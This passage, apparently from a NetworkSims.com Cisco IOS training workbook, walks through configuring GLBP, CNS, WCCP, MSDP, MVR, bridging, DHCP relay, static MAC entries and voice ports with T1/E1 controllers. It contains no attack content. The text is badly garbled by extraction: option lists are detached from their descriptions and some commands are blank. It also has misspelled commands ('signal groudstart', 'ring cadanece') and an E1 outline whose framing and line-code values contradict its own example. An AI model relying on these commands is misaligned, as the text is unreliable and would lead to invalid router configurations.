Saturday
Saturday
Sunday
Sunday
Thursday
Thursday
Tuesday
Tuesday
Wednesday Wednesday
daily
Every day of the week
weekdays
Monday thru Friday
weekend
Saturday and Sunday
interval Performance monitoring interval in seconds
quiet
Turn on quiet mode for perfomance monitoring
settings View perfomance monitoring settings
verbose
Turn on verbose mode for perfomance monitoring
(config-time-range)# periodic weekday ?
hh:mm Starting time
(config-time-range)# periodic weekday 5:00 ?
to ending day and time
(config-time-range)# periodic weekday 5:00 to ?
hh:mm Ending time - stays valid until beginning of next minute

Outline
Gateway Load Balancing Protocol (GLBP) in the same way as Hot Standby Router Protocol
(HSRP) and Virtual Router Redundancy Protocol (VRRP) provides an alternative route for
network traffic from a failed router or circuit. It also supports load sharing between a group
of redundant routers. This challenge involves the configuration of GLBP.
Objectives
NetworkSims.com
1036
Define GLBP details.

Enable GLBP.
Outline
Example
(config-if)# glbp ?
<0-1023> Group number
(config-if)# glbp 10 ?
authentication Authentication method
forwarder
Forwarder configuration
ip
Enable group and set virtual IP address
load-balancing Load balancing method
name
Redundancy name
preempt
priority
Priority level
timers
Adjust GLBP timers
weighting
Gateway weighting and tracking
(config-if)# glbp 10 authentication ?
md5
MD5 authentication
(config-if)# glbp 10 authentication text ?
WORD Text authentication string
(config-if)# gl 10 forwarder ?
preempt Overthrow lower priority active forwarders
(config-if)# gl 10 forwarder preempt ?
<cr>
(config-if)# gl 10 forwarder preempt delay ?
minimum Delay at least this long
(config-if) glbp 10 forwarder preempt delay minimum ?
<0-3600> Number of seconds for minimum delay
(config-if)# glbp 10 load-balancing ?
host-dependent Load balance equally, source MAC determines forwarder choice
round-robin
Load balance equally using each forwarder in turn
weighted
Load balance in proportion to forwarder weighting
NetworkSims.com
1037
(config-if)# glbp 10 pre ?

<cr>
(config-if)# glbp 10 pri ?
(config-if)# glbp 10 timers ?
<1-60>
Hello interval in seconds
msec
redirect Specify time-out values for failed forwarders
(config-if)# glbp 10 ip ?
glbp 10 authentication text testing
This command authenticates GLBP packets

received from the group of routers.
glbp
10
forwarder
preempt
delay This command allows the router to take
minimum 60
over as AVF (Active Virtual Forwarder)
within a GLBP group, if it has a higher
priority than the current AVF.
glbp 10 load-balancing host-dependent
This command specifies the load balancing
method such as: host-dependent, roundrobin or weighted.
glbp 10 preempt delay minimum 60
This command allows the router to take
over as AVG (Active Virtual Gateway)
with a GLBP group, if it has a higher
priority than the current AVG.
glbp 10 priority 254
This command sets up the priority level of
the gateway within a GLBP group.
glbp 10 timers 5 18
This command configures the interval
between hello packets sent by the AVG
within the GLBP group. The parameters
include the holdtime which specifies time
before the virtual gateway and virtual
forwarder information is considered
invalid.
glbp 10 ip 192.168.0.2
Enable GLBP and define a virtual interface
address.

Outline
Virtual Router Redundancy Protocol (VRRP) in the same way as Hot Standby Router
Protocol (HSRP) and Gateway Load Balancing Protocol (GLBP). It provides an alternative
NetworkSims.com
1038
route for network traffic from a failed router or circuit.. This challenge involves the
configuration of VRRF.
Objectives
Define VRRF details.

Enable VRRF.
Outline
Example
NetworkSims.com
1039
22 Switch Additional
Outline
This challenge involves setting up CNS.
Objectives
Enable CNS.
Example
> en
# config t
(config)# cn ?
config
Configuration Agent
event
Event Agent
exec
Exec Agent
id
Get CNS ID for CNS agents
trusted-server Trusted Server Configuration
(config)# cn ev ?
WORD Hostname or ip address of event gateway
(config)# cn ev 10.0.0.1 ?
<0-65535>
Event Gateway port number, default is 11011
backup
Event Agent backup gateway
encrypt
Enable Event Agent encryption
failover-time Seconds to wait for route to Primary after we already have
route to backup
keepalive
Keepalive timeout retry_count
source
bind socket to a source ip
<cr>
(config)# cn ev 10.0.0.1 k ?
<0-65535> timeout in seconds , default is 0
(config)# cn ev 10.0.0.1 k 120 ?
<0-65535> retry count , default is 0
(config)# cn ev 10.0.0.1 k 120 10 ?
failover-time Seconds to wait for route to Primary after we already have
route to backup
<cr>
NetworkSims.com
1040
(config)# cns event 10.0.0.1 keepalive 120 10

(config)# cns config connect-intf serial ping-interval 1 retries 1
(config-cns-conn-if)# ?
CNS bootstrap configuration commands:
config-cli Connect interface config cli
exit
Exit from connect interface config mode
line-cli
line cli for configuring modem lines
(config-cns-conn-if)# config-cli ip address negotiated
(config-cns-conn-if)# config-cli encapsulation ppp
(config-cns-conn-if)# config-cli ip directed-broadcast
(config-cns-conn-if)# config-cli no keepalive
(config-cns-conn-if)# config-cli no shutdown
(config-cns-conn-if)# exit
(config)# cns id ?
Async
Async interface
BVI
Dialer
Dialer interface
FastEthernet
GigabitEthernet
Group-Async
Lex
Lex interface
Loopback
Loopback interface
Multilink
Port-channel
Tunnel
Tunnel interface
Virtual-Template
Vlan
Catalyst Vlans
hardware-serial
Use hardware serial number as unique ID
hostname
Use hostname as unique ID
string
Use an arbitrary string as the unique ID
(config)# cns id FA0/1 ?
dns-reverse Use DNS reverse look up to assign the hostname
ipaddress
Use IP address as unique ID
mac-address Use MAC address as unique ID
(config)# cns id FA0/1 ipaddress ?
event Set this ID as the event ID
<cr>
(config)# cns id FA0/1 ipaddress

Outline
This challenge involves setting up Web cache.
Objectives
Enable Web-cache.
NetworkSims.com
1041
Apply redirection on FA0/2 and FA0/3.
Example
> en
Switch# config t
Switch(config)# ip wccp ?
Switch(config) # ip wccp web-cache ?
password Authentication password (key)
<cr>
Switch(config)# ip wccp web-cache
Switch(config-if)# no shutdown
Switch(config-if)# ip wccp ?
Switch(config-if)# ip wccp web-cache ?
redirect Set packet redirection options for the service
Switch(config-if)# ip wccp web-cache redirect ?
in Redirect to a Cache Engine appropriate inbound packets
Switch(config-if)# ip wccp web-cache redirect in ?
<cr>
Switch(config-if)# ip wccp web-cache redirect in
Explanation
The Web Cache Communication Protocol (WCCP) is used to configure the switch to
redirect traffic to cache engines, which transparently store frequently accessed
content and then deliver the cached version to the clients. WCCP is enabled on the
switch with:
Switch(config)# ip wccp web-cache
Then on the interface Layer 3 access is defined with:

Then to redirect the traffic to the client engine:

Switch(config-if)# ip wccp web-cache redirect in
In this example the Web cache is connected to FA0/1, and web accesses are directed to this
port.

NetworkSims.com
1042
Outline
This challenge involves setting up MSDP.
Objectives
Enable MSDP.
Example
> en
Switch# config t
Switch(config)# ip msdp ?
cache-rejected-sa Store rejected SAs from all peers
cache-sa-state
Configure this system to cache SA state
default-peer
Default MSDP peer to accept SA messages from
description
Peer specific description
filter-sa-request Filter SA-Requests from peer
keepalive
Configure keepalive parameters for a peer
mesh-group
Configure an MSDP mesh-group
originator-id
Configure MSDP Originator ID
peer
Configure an MSDP peer
redistribute
Inject multicast route entries into MSDP
sa-filter
Filter SA messages from peer
sa-limit
Configure SA limit for a peer
shutdown
Administratively shutdown MSDP peer
timer
MSDP timer
ttl-threshold
Configure TTL Thresold for MSDP Peer
Switch(config)# ip msdp cache-sa-state ?
<cr>
Switch(config)# ip msdp cache-sa-state
Switch(config)# ip msdp filter-sa ?
Hostname or A.B.C.D Peer name or address
Switch(config)# ip msdp filter-sa 1.2.3.4 ?
list Access-list
<cr>
Switch(config)# ip msdp filter-sa 1.2.3.4

Outline
This challenge involves the configuring MVR (Multicast VLAN Registration) which is used
in applications that have a wide-scale deployment of multicast traffic over an Ethernet ringbased service provider network. This is typical in broadcasing TV channels. With MVR
subscribers can listen on multicast addresses on certains VLANs.
NetworkSims.com
1043
Objectives
Define VLANs.
Setup MVR
Example
> enable
# config t
(config)# vlan 1
(config-vlan)# ?
are
backupcrf
bridge
exit
media
mtu
name
no
parent
remote-span
ring
said
IEEE 802.10 SAID
shutdown
state
ste
stp
tb-vlan1
zero if none)
tb-vlan2
zero if none)
(config-vlan)# name edinburgh
(config-vlan)# no ?
are
backupcrf
bridge
exit
media
mtu
name
parent
remote-span
ring
said
IEEE 802.10 SAID
shutdown
state
ste
NetworkSims.com
1044
stp
tb-vlan1

zero if none)
tb-vlan2
zero if none)
(config-vlan)# no shutdown
(config-vlan)# exit
(config-if)# exit
(config)# mvr ?
group
Configure a MVR multicast group
mode
Configure MVR mode of operation
querytime Set MVR query response time
vlan
Set MVR multicast VLAN
<cr>
(config)# mvr
(config)# mvr group ?
A.B.C.D IP multicast address
(config)# mvr group 224.1.23.4
(config)# mvr querytime ?
<1-100> time value in units of 1/10 seconds
(config)# mvr querytime 5
(config)# mvr vlan ?
<1-4094> MVR Multicast VLAN id
(config)# mvr vlan 12
(config)# mv m ?
compatible Compatible Mode
dynamic
Dynamic Mode
<cr>
(config)# mvr mode dynamic

Outline
This challenge involves the setting up a bridge-group for fallback bridging (VLAN bridging)
which fallback bridging, non-IP packets, that the switch does not route between VLAN
bridge domains and routed ports, are forwarded.
Objectives
Define a bridge-group.
Apply it to FA0/2
Example
> enable
# config t
Switch(config)# bridge ?
NetworkSims.com
1045
<1-255>
crb
irb
mac-address-table
Bridge Group number for Bridging.

Concurrent routing and bridging
Integrated routing and bridging
MAC-address table configuration commands
Switch(config)# bridge 10 ?
acquire
address
aging-time
bitswap-layer3-addresses
bridge
circuit-group
domain
forward-time
hello-time
lat-service-filtering
max-age
BPDUs
priority
protocol
route
Dynamically learn new, unconfigured stations

Block or forward a particular Ethernet address
Set forwarding entry aging time
Bitswap embedded layer 3 MAC adddresses
Specify a protocol to be bridged in this bridge
group
Circuit-group
Establish multiple bridging domains
Set forwarding delay time
Set interval between HELLOs
Perform LAT service filtering
Maximum allowed message age of received Hello
Set bridge priority

Specify spanning tree protocol
Specify a protocol to be routed in this bridge
group
subscriber-policy
Subscriber group bridging
Switch(config)# bridge 10 protocol vlan-bridge
Switch(config)# bridge 10 aging-time ?
<10-1000000> Seconds
Switch(config)# bridge 10 aging-time 20
Switch(config)# bridge 10 hello-time 20
Switch(config)# bridge 10 forward-time 20
Switch(config)# bridge 10 max-age 10
Switch(config)# bridge 10 priority ?
<0-65535> Priority (low priority more likely to be root)
Switch(config)# bridge 10 priority 10
Switch(config)# interface fa0/1
Switch(config-if)# bridge-group ?
Switch(config-if)# bridge-group 10 ?
<cr>
circuit-group
input-address-list
group list
group list
input-lsap-list
input-type-list
lat-compression
interfaces
output-address-list
group list
a group list
output-lsap-list
output-type-list
port-protected
and other protected
NetworkSims.com
1046
address
input-pattern-list
output-pattern-list
path-cost
priority
source-learning
spanning-disabled
unicast-flooding
addresses
Switch(config-if)# bridge-group 10
Switch(config-if)# bridge-group 10 path-cost ?
<0-65535> Path cost (higher values are higher costs)
Switch(config-if)# bridge-group 10 path-cost 10
Switch(config-if)# bridge-group 10 spanning-disable

Area: Switches DHCP Reforwarding
Outline
This challenge involves defining DHCP reforwarding
Objectives
Define DHCP reforwarding.

> enable
# config t
(config)# ip dhcp relay information option
(config)# ip dhcp relay information policy drop
Example
> enable
# config t
(config)# service ?
compress-config
config
dhcp
exec-callback
exec-wait
finger
NetworkSims.com

1047
linenumber
nagle
old-slip-prompts
pad
password-encryption
prompt
pt-vty-logging
sequence-numbers
slave-log
tcp-keepalives-in
tcp-keepalives-out
tcp-small-servers
telnet-zeroidle
timestamps
udp-small-servers

Enable PAD commands
connections
connections

(config)# ip dhcp ?
conflict
database
excluded-address
ping
pool
relay
smart-relay
snooping

DHCP Snooping
(config)# ip dhcp relay ?

forward
Enable forwarding DHCP broadcasts
information Relay agent information option
(config)# ip
check
option
policy
trust-all
dhcp relay information ?

Validate relay information in BOOTREPLY
Insert relay information in BOOTREQUEST
Define reforwarding policy
Received DHCP packets may contain relay info option with zero
giaddr
(config)# ip dhcp relay information option ?

<cr>
(config)# ip dhcp relay information option
(config)# ip dhcp relay information policy ?
drop
Do not forward BOOTREQUEST message with existing information
keep
Leave existing information alone
replace Replace exisiting information
(config)# ip dhcp relay information policy drop

Area: Switches Static MAC setup
Outline
NetworkSims.com
1048
MAC address notification allows the tracking of MAC address activity through SNMP using
a trap which sends information to an SNMP server when there is activity. The trap interval
defines the time that the updates will be send to the SNMP server which can reduce
network traffic when there are a great deal of MAC address activity.
Objectives
Define static MAC addresses.

# config t
(config)# mac address-table static 1.1.1 vlan 1 interface fa0/1
Example
# config t
(config)# mac add ?
aging-time
static
static keyword
(config)# mac add s ?
H.H.H 48 bit mac address
(config)# mac add s 1.1.1 ?
vlan VLAN keyword
(config)# mac add s 1.1.1 v ?
<1-4094> VLAN id of mac address table
(config)# mac add s 1.1.1 v 1 ?
drop
drop frames
interface interface
Switch(config)# mac add s 1.1.1 v 1 interface ?
FastEthernet
Port-channel
# sh mac address-table static
Mac Address Table
------------------------------------------Vlan
---All
All
All
Mac Address
----------0012.00b0.2780
0012.00b0.2781
0012.00b0.2782
NetworkSims.com
Type
-------STATIC
STATIC
STATIC
Ports
----CPU
CPU
CPU
1049
All
0012.00b0.2783
STATIC
CPU
All
0012.00b0.2784
STATIC
CPU
All
0012.00b0.2785
STATIC
CPU
All
0012.00b0.2786
STATIC
CPU
All
0012.00b0.2787
STATIC
CPU
All
0012.00b0.2788
STATIC
CPU
All
0012.00b0.2789
STATIC
CPU
All
0012.00b0.278a
STATIC
CPU
All
0012.00b0.278b
STATIC
CPU
All
0012.00b0.278c
STATIC
CPU
All
0012.00b0.278d
STATIC
CPU
All
0012.00b0.278e
STATIC
CPU
All
0012.00b0.278f
STATIC
CPU
All
0012.00b0.2790
STATIC
CPU
All
0012.00b0.2791
STATIC
CPU
All
0012.00b0.2792
STATIC
CPU
All
0012.00b0.2793
STATIC
CPU
All
0012.00b0.2794
STATIC
CPU
All
0012.00b0.2795
STATIC
CPU
All
0012.00b0.2796
STATIC
CPU
All
0012.00b0.2797
STATIC
CPU
All
0012.00b0.2798
STATIC
CPU
All
0012.00b0.2799
STATIC
CPU
All
0012.00b0.279a
STATIC
CPU
All
0100.0c00.0000
STATIC
CPU
All
0100.0ccc.cccc
STATIC
CPU
All
0100.0ccc.cccd
STATIC
CPU
All
0100.0ccd.cdce
STATIC
CPU
All
0180.c200.0000
STATIC
CPU
All
0180.c200.0001
STATIC
CPU
All
0180.c200.0002
STATIC
CPU
All
0180.c200.0003
STATIC
CPU
All
0180.c200.0004
STATIC
CPU
All
0180.c200.0005
STATIC
CPU
All
0180.c200.0006
STATIC
CPU
All
0180.c200.0007
STATIC
CPU
All
0180.c200.0008
STATIC
CPU
All
0180.c200.0009
STATIC
CPU
All
0180.c200.000a
STATIC
CPU
All
0180.c200.000b
STATIC
CPU
All
0180.c200.000c
STATIC
CPU
All
0180.c200.000d
STATIC
CPU
All
0180.c200.000e
STATIC
CPU
All
0180.c200.000f
STATIC
CPU
All
0180.c200.0010
STATIC
CPU
Total Mac Addresses for this criterion: 48

Area: Switches SDR (Session Announcement Protocol (SAP) designated router) listener
Outline
This challenge defines setting up an SDR listening on the switch.
Objectives
NetworkSims.com
1050
Define SDR cache timeout.

Define SRD listener on an interface.

# config t
(config)# ip sdr cache-timeout 10
(config)# int fa0/1
(config-if)# ip sdr listen
(config)# int fa0/2
(config)# int fa0/3
Notes
# config t
(config)# ip sdr ?
cache-timeout Timeout period for entries
(config)#ip sdr cache-timeout ?
(config)#ip sdr cache-timeout 10 ?
<cr>
(config)#ip sdr cache-timeout 10
(config)# int fa0/1
(config-if)# ip ?
access-group
accounting
address
authentication
bandwidth-percent
bgp
broadcast-address
cef
cgmp
Enable/disable CGMP
dhcp
dvmrp
hello-interval
helper-address
hold-time
igmp
irdp
load-sharing
local-proxy-arp
mask-reply
mrm
mroute-cache
mtu
multicast
ospf
NetworkSims.com
1051
pim
policy
probe
proxy-arp
Enable proxy ARP
rarp-server
redirects
rgmp
Enable/disable RGMP
rip
route-cache
sap
sdr
security
split-horizon
summary-address
unnumbered
unreachables
urd
vrf
wccp
(config-if)# ip cgmp ?
proxy
CGMP for hosts and proxy for multicast routers
router-only CGMP proxy for multicast routers only
<cr>
(config)# int fa0/2
(config)# int fa0/3
NetworkSims.com
1052
23 CCVP (Voice)
Cisco CCVP Test 1
Introduction to Voice Technologies
http://networksims.com/v01.html

Outline
Objectives

Enable the S0 port.
Define the speed of the S0 port.
Define EIGRP routing.
Commands
> enable
# config t
(config)# int s0
(config-if)# exit
(config-network)# network 10.0.0.1
NetworkSims.com
1053
Example
> enable
# config t
(config)# int s0
atm-dxi
hdlc
lapb
LAPB (X.25 Level 2)
ppp
smds
x25
X.25
(config-if)# ppp ?
accm
acfc
bridge
chap
ipcp
lcp
link
max-bad-auth
multilink
pap
pfc
quality
reliable-link
timeout
use-tacacs
(config-if)# ppp authentication?
chap
pap
1200
2400
4800
9600
14400
19200
28800
32000
38400
56000
57600
64000
72000
115200
125000
128000
148000
NetworkSims.com
1054
192000
250000
256000
384000
500000
512000
768000
800000
1000000
1300000
2000000
4000000
8000000
<300-4000000>
(config-if)# exit
# sh running

Outline
Objectives

Setup encapsulation on the S1 port.
Setup authentication on the S1 port.
Define other S1 parameters.
Example
> enable
# config t
(config)# int s1
(config-if)# description academics
(config-if)# exit
# sh running
NetworkSims.com
1055
Cisco CCVP Test 2

Introduction to Voice Technologies

Outline
This challenge involves the configuration of FXS (Foreign Exchange Station) Voice Port
Configuration on a Voice-enabled router. Some routers have FXS interfaces which can
connect to a standard telephone, fax machine, or similar device and thus must provide
ringing, voltage supplies, and a dial tone. Normally the FXS interface uses an RJ-11
connector to connect to telephone equipment.
Objectives
Define FXS Voice Port details.

Define FXS country details.
Outline
> enable
# sh version
# config t
(config-voiceport)# signal groudstart
(config-voiceport)# cptone GB
(config-voiceport)# ring cadanece pattern01
(config)# exit
# show voice port
# show voice dsp
Example
> enable
# sh version
NetworkSims.com
1056

SOFTWARE (fc1)
Version
12.4(12),
32K bytes of NVRAM.
# config t
(config-voiceport)# signal ?
groundStart Ground Start
loopStart
Loop Start
(config-voiceport)# cptone ?
locale
2 letter ISO-3166 country code
AR
AU
AT
BE
BR
CA
CN
CO
C1
C2
CY
CZ
DK
EG
FI
FR
DE
GH
GR
HK
HU
Argentina
Australia
Austria
Belgium
Brazil
Canada
China
Colombia
Custom1
Custom2
Cyprus
Czech Republic
Denmark
Egypt
Finland
France
Germany
Ghana
Greece
Hong Kong
Hungary
IS
IN
ID
IE
IL
IT
JP
JO
KE
KR
LB
LU
MY
MX
NP
NL
NZ
NG
NO
PK
PA
Iceland
India
Indonesia
Ireland
Israel
Italy
Japan
Jordan
Kenya
Korea Republic
Lebanon
Luxembourg
Malaysia
Mexico
Nepal
Netherlands
New Zealand
Nigeria
Norway
Pakistan
Panama
PE
PH
PL
PT
RU
SA
SG
SK
SI
ZA
ES
SE
CH
TW
TH
TR
GB
US
VE
ZW
Peru
Philippines
Poland
Portugal
Russian Federation
Saudi Arabia
Singapore
Slovakia
Slovenia
South Africa
Spain
Sweden
Switzerland
Taiwan
Thailand
Turkey
United Kingdom
United States
Venezuela
Zimbabwe
(config-voiceport)# ring ?
cadence
Ringing cadence on/off durations
frequency The ring frequency to be used in the FXS interface
(config-voiceport)# ring cadence ?
NetworkSims.com
1057
RELEASE
define
pattern01
pattern02
pattern03
pattern04
pattern05
pattern06
pattern07
pattern08
pattern09
pattern10
pattern11
pattern12
User Defined Cadence

2sec on 4sec off
1sec on 4sec off
1.5sec on 3.5sec off
1sec on 2sec off
1sec on 5sec off
1sec on 3sec off
.8sec on 3.2sec off
1.5sec on 3sec off
.4sec on .2sec off .4sec on 2sec off
.4sec on .2sec off .4sec on 2.6sec off
(config-voiceport)# ring cadence pattern01

(config)# exit
# sh voice port
Foreign Exchange Station 1/0/0 Slot is 1, Sub-unit is 0, Port is 0
Type of VoicePort is FXS
Operation State is DORMANT
Administrative State is UP
No Interface Down Failure
Description is not set
Noise Regeneration is enabled
Non Linear Processing is enabled
Non Linear Mute is disabled
Non Linear Threshold is -21 dB
Music On Hold Threshold is Set to -38 dBm
In Gain is Set to 0 dB
Out Attenuation is Set to 3 dB
Echo Cancellation is enabled
Echo Cancellation NLP mute is disabled
Echo Cancellation NLP threshold is -21 dB
Echo Cancel Coverage is set to 8 ms
Echo Cancel worst case ERL is set to 6 dB
Playout-delay Mode is set to adaptive
Playout-delay Nominal is set to 60 ms
Playout-delay Maximum is set to 250 ms
Playout-delay Fax is set to 300 ms
Connection Mode is normal
Connection Number is not set
Initial Time Out is set to 10 s
Interdigit Time Out is set to 10 s
Call Disconnect Time Out is set to 60 s
Supervisory Disconnect Time Out is set to 750 ms
Ringing Time Out is set to 180 s
Wait Release Time Out is set to 30 s
Companding Type is u-law
Region Tone is set for US
Analog Info Follows:
Currently processing none
Maintenance Mode Set to None (not in mtc mode)
Number of signaling protocol errors are 0
Impedance is set to 600r Ohm
Station name None, Station number None
Translation profile (Incoming):
Translation profile (Outgoing):
Voice card specific Info Follows:
Signal Type is loopStart
NetworkSims.com
1058
Ring Frequency is 25 Hz
Hook Status is On Hook
Ring Active Status is inactive
Ring Ground Status is inactive
Tip Ground Status is active
Digit Duration Timing is set to 100 ms
InterDigit Duration Timing is set to 100 ms
Hookflash-in Timing is set to max=1000 ms, min=150 ms
Hookflash-out Timing is set to 400 ms
No disconnect acknowledge
Ring Cadence is defined by CPTone Selection
Ring Cadence are [20 40] * 100 msec
Ringer Equivalence Number is set to 1
Foreign Exchange Station 1/0/1 Slot is 1, Sub-unit is 0, Port is 1
Type of VoicePort is FXS
Operation State is DORMANT
Administrative State is UP
No Interface Down Failure
Description is not set
Noise Regeneration is enabled
Non Linear Processing is enabled
Non Linear Threshold is -21 dB
Music On Hold Threshold is Set to -38 dBm
In Gain is Set to 0 dB
Out Attenuation is Set to 3 dB
Echo Cancellation is enabled
Echo Cancellation NLP mute is disabled
Echo Cancellation NLP threshold is -21 dB
Echo Cancel Coverage is set to 8 ms
Echo Cancel worst case ERL is set to 6 dB
Playout-delay Mode is set to adaptive
Playout-delay Nominal is set to 60 ms
Playout-delay Maximum is set to 250 ms
Playout-delay Minimum mode is set to default, value 40 ms
Playout-delay Fax is set to 300 ms
Connection Mode is normal
Connection Number is not set
Initial Time Out is set to 10 s
Interdigit Time Out is set to 10 s
Call Disconnect Time Out is set to 60 s
Supervisory Disconnect Time Out is set to 750 ms
Ringing Time Out is set to 180 s
Wait Release Time Out is set to 30 s
Companding Type is u-law
Region Tone is set for US
Analog Info Follows:
Currently processing none
Maintenance Mode Set to None (not in mtc mode)
Number of signaling protocol errors are 0
Impedance is set to 600r Ohm
Station name None, Station number None
Translation profile (Incoming):
Translation profile (Outgoing):
Voice card specific Info Follows:
Signal Type is loopStart
Ring Frequency is 25 Hz
Hook Status is On Hook
Ring Active Status is inactive
NetworkSims.com
1059
Ring Ground Status is inactive

Tip Ground Status is active
Digit Duration Timing is set to 100 ms
InterDigit Duration Timing is set to 100 ms
Hookflash-in Timing is set to max=1000 ms, min=150 ms
Hookflash-out Timing is set to 400 ms
No disconnect acknowledge
Ring Cadence is defined by CPTone Selection
Ring Cadence are [20 40] * 100 msec
Ringer Equivalence Number is set to 1
Playout-delay Minimum mode is set to default, value 40 ms
# sh voice dsp
DSP DSP
TYPE NUM CH CODEC
DSPWARE CURR BOOT

VERSION STATE STATE
PAK
RST AI VOICEPORT TS ABORT
TX/RX
PACK COUNT
==== === == ======== ======= ===== ======= === == ========= == ===== ============
C542 001 01 None
4.4.21 IDLE idle
0 0 1/0/0
NA
0
604/613
C542 002 01 None
4.4.21 IDLE idle
0 0 1/0/1
NA
0
597/594

Outline
This challenge involves the configuration of FXO (Foreign Exchange Office) Voice Port
Configuration on a Voice-enabled router. FXS are edge devices whereas the FXO port
connects to the PBX.
Objectives
Define FXO Voice Port details.
Outline
> enable
# sh version
# config t
(config-voiceport)# signal loopstart
(config-voiceport)# ring number 3
(config-voiceport)# dial-type dtmf
Example
> enable
# sh version
# config t
battery-reversal
NetworkSims.com
1060
bearer-cap
busyout
caller-id
comfort-noise
connection
cptone
default
description
disc_pi_off
disconnect-ack
echo-cancel
exit
impedance
input
music-threshold
mwi
no
non-linear
output
playout-delay
ren
ring
shutdown
signal
snmp
station-id
supervisory
threshold
timeouts
timing
translate
Translation rule
trunk-group
voice-class
battery-reversal
Enable FXO battery-reversal detection
bearer-cap
busyout
comfort-noise
connection
cptone
default
description
dial-type
Configure type of dialer for voice
disc_pi_off
echo-cancel
exit
impedance
input
music-threshold
no
non-linear
output
playout-delay
pre-dial-delay
FXO Pre-dial Delay
ring
Number of rings
shutdown
signal
snmp
station-id
supervisory
Configure answer + disconnect supervision options
NetworkSims.com
1061
threshold
timeouts
timing
translate
Translation rule
trunk-group
voice-class
(config-voiceport)# ring ?
number Number of rings for the FXO interface
(config-voiceport)# ring number ?
<1-10> The number of rings detected before closing loop
(config-voiceport)# dial ?
dtmf
touch-tone dialer
mf
mf-tone dialer
pulse pulse dialer
This answers on the third ring and uses DTMF (touch-tone dialer) ring tone type.

Outline
This challenge involves the configuration of FXS (Foreign Exchange Station) Voice Port
Configuration for the main configuration timers, especially in situations where users require
more time to dial numbers. The main timeouts are initial timeout, interdigit timeout,
ringing timeout and the hookflash-in timer.
Objectives
Define FXS Voice Port details.

Define FXS country details.
Define voice port timer settings, especially for initial timeout, interdigit timeout,
ringing timeout and the hookflash-in timer.
Outline
> enable
# sh version
# config t
(config-voiceport)# timeout call-disconnect 10
(config-voiceport)# timeout initial 15
(config-voiceport)# timeout interdigit 20
(config-voiceport)# timeout ringing 60
NetworkSims.com
1062
(config-voiceport)# timeout hookflash-in 500
Example
> enable
# sh version
# config t
(config-voiceport)# timeout ?
call-disconnect Call Disconnect Timeout after Destination Hangs Up in
seconds
hookflash-in
Define hookflash-in delay in milliseconds
initial
Initial Timeout duration in seconds
interdigit
Interdigit Timeout duration in seconds
power-denial
Duration for which power-denial is applied
ringing
Ringing no answer timeout duration in seconds
wait-release
Wait release timeout duration in seconds
(config-voiceport)# timeout call-disconnect ?
<0-120>
seconds
infinity infinite timeout
(config-voiceport)# timeout initial ?
<0-120> seconds
(config-voiceport)# timeout interdigit ?
<0-120> seconds
(config-voiceport)# timeout power-denial ?
<0-1500> milliseconds
(config-voiceport)# timeout ringing ?
<5-60000> seconds
infinity
infinite timeout
(config-voiceport)# timeout wait-release ?
<1-3600> seconds
(config-voiceport)# timeout call-disconnect 10
(config-voiceport)# timeout initial 15
(config-voiceport)# timeout interdigit 20
(config-voiceport)# timeout ringing 60
(config-voiceport)# timeout hookflash-in 500
This sets the ringing timeout to 60 seconds, which gives the user up to one minute to answer
the call. It also increases the interdigit timeout to 20 seconds, which again gives users a
maximum time between dialing digits of 20 seconds.
The hookflash is a brief interruption in the loop current when a trunk route starts, and is not
taken as a call disconnect. It is caused by momentarily pressing down the cradle on a
telephone. Also, some telephones reserve a button (such as 'recall') that sends a timed loop
break.

NetworkSims.com
1063
Outline
There are two main base TDM (Time Division Multiplexing) streams, these are E1 (mainly
used in Europe) and T1 (mainly used in the USA). These streams give 2.048Mbps (for E1
with 32 channels) and 1.544Mbps (for T1 with 24 channels). This challenge involves defining
the paramters for a T1 connection.
Objectives
Define T1 configuration details.

Define the framing type.
Define the clock source.
Define the line code used.
Define how many channels are used (DS0 group), and the signaling type (E&M
Wink Start signaling).
Outline
> enable
# sh version
# config t
(config)# controller t1
(config-controller)# framing esf
(config-controller)# clock source line
(config-controller)# linecode b8zs
(config-controller)# ds0-group 1 timeslots 1-2 type e&m-wink-start
(config-controller)# pri-group timeslots 1-24
(config-controller)# no shutdown
(config-controller)# exit
(config)# isdn switch-type primary-qsig
Example
> enable
# sh version
# config t
(config-controller)# ?
Controller configuration commands:
cablelength
Specify cable length for a DS1 link
cas-group
Configure the specified timeslots for CAS(Channel Associate Signals)
channel-group Specify timeslots to channel-group mapping for an interface
clock
Specify the clock source for a DS1 link
default
description
Controller specific description
ds0
ds0 commands
exit
Exit from controller configuration mode
fdl
Specify the FDL standard for a DS1 data link
framing
Specify the type of Framing on a DS1 link
help
NetworkSims.com
1064
linecode
Specify line encoding method for a DS1 link
loopback
Put the entire T1 line into loopback
no
pri-group
Configure specified timeslots for PRI
shutdown
Shut down a DS1 link (send Blue Alarm)
(config-controller)# ds0-group 1 timeslots 1-2 type e&m-wink-start
(config)# exit
# sh controller t1
T1 is up.
Applique type is Channelized T1
Cablelength is long gain36 0db
No alarms detected.
alarm-trigger is not set
Slot 4 CSU Serial #09480883 Model TEB HWVersion 6.00 RX level = 0DB
Configured clock mode swapped to Loop-timed by priority clocking!!
Framing is ESF, Line Code is B8ZS, Clock Source is Line.

Outline
There are two main base TDM (Time Division Multiplexing) streams, these are E1 (mainly
used in Europe) and T1 (mainly used in the USA). These streams give 2.048Mbps (for E1
with 32 channels) and 1.544Mbps (for T1 with 24 channels). This challenge involves defining
the parameters for a E1 connection.
Objectives
Define E1 configuration details.

Define the framing type.
Define the clock source.
Define the line code used.
Outline
> enable
# sh version
# config t
(config)# controller
(config-controller)#
NetworkSims.com
e1
framing esf
clock source line
linecode crc4
no shutdown
1065
Example
> enable
# sh version
# config t
(config)# controller e1
(config-controller)# framing crc4
(config-controller)# linecode hdb3
(config)# exit
# show controllers e1
E1 is up.
Applique type is Channelized E1 - balanced
No alarms detected.
Version info of Slot 0: HW: 2, Firmware: 4, PLD Rev: 2
Manufacture Cookie is not programmed.
Framing is CRC4, Line Code is HDB3, Clock Source is Line Primary.
Data in current interval (251 seconds elapsed):
0 Line Code Violations, 0 Path Code Violations
0 Slip Secs, 0 Fr Loss Secs, 0 Line Err Secs, 0 Degraded Mins
0 Errored Secs, 0 Bursty Err Secs, 0 Severely Err Secs, 0 Unavail Secs
Total Data (last 24 hours)
0 Line Code Violations, 0 Path Code Violations,
0 Slip Secs, 0 Fr Loss Secs, 0 Line Err Secs, 0 Degraded Mins,
0 Errored Secs, 0 Bursty Err Secs, 0 Severely Err Secs, 0 Unavail Secs

Outline
This challenge involves the configuration of FXO (Foreign Exchange Office) Voice Port
Configuration on a Voice-enabled router, and fine tuning the voice port details, such as for
the input gain and the output attenuation.
Objectives
Define FXO Voice Port details.

